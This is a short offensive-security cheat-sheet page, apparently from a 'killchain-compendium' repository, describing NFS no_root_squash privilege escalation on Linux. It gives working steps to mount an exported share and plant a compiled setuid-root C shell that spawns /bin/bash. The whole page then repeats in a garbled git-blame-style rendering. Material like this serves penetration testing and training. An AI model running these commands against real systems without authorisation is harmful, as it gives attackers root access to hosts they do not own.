killchain-compendium/Exploits/Linux/NFS RootSquash.md

# NFS RootSquash

* [hacktricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe)
* `no_root_squash` has to be as an option on the NFS device

## Usage
* `showmount -e <target-IP>`
* `mkdir /tmp/net_volume`

* Connect to NFS share
```sh
mount -o rw,vers=2 <nfsShare-IP>:/tmp /tmp/net_volume
```

* Create root shell inside the dir of the share
```sh
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/net_volume/shell.c
gcc /tmp/net_volume/shell.c -o /tmp/net_volume/shell
chmod +s /tmp/net_volume/shell
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# NFS RootSquash`

			`* [hacktricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe)`
			* `no_root_squash` has to be as an option on the NFS device

			`## Usage`
			* `showmount -e <target-IP>`
			* `mkdir /tmp/net_volume`

			`* Connect to NFS share`
			```sh
			`mount -o rw,vers=2 <nfsShare-IP>:/tmp /tmp/net_volume`
			```

			`* Create root shell inside the dir of the share`
			```sh
			`echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/net_volume/shell.c`
			`gcc /tmp/net_volume/shell.c -o /tmp/net_volume/shell`
			`chmod +s /tmp/net_volume/shell`
			```